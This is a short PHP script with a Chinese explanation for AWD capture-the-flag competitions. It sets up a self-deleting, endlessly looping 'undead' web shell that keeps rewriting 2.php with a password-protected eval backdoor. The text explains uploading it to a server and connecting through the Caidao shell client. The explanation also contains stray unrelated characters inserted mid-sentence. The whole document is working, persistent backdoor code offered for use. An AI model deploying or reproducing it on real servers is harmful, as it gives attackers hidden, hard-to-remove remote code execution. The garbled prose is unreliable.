<?php
ignore_user_abort(true);
set_time_limit(0);
unlink(__FILE__);
$file = '2.php';
$code = '<?php if(md5($_GET["pass"])=="1a1dc91c907325c69271ddf0c944bc72"){@eval($_POST[a]);} ?>';
while (1){
file_put_contents($file,$code);
usleep(5000);
}
?>
在awd中不死馬對于持續(xù)獲取用戶權(quán)限是十分有幫助的,將這個文件上傳到服務(wù)器拯爽,然后進行訪問巡揍,會在該路徑下一直生成一個名字為2.php的shell文件蘑斧,然后使用caidao輸入http://xxx/2.php?pass=pass的路徑,密碼為a就可以鏈接一句話边翼,由于pass是md5加密很難被破解也可以做到隱蔽,md5值可以隨意定義鱼响。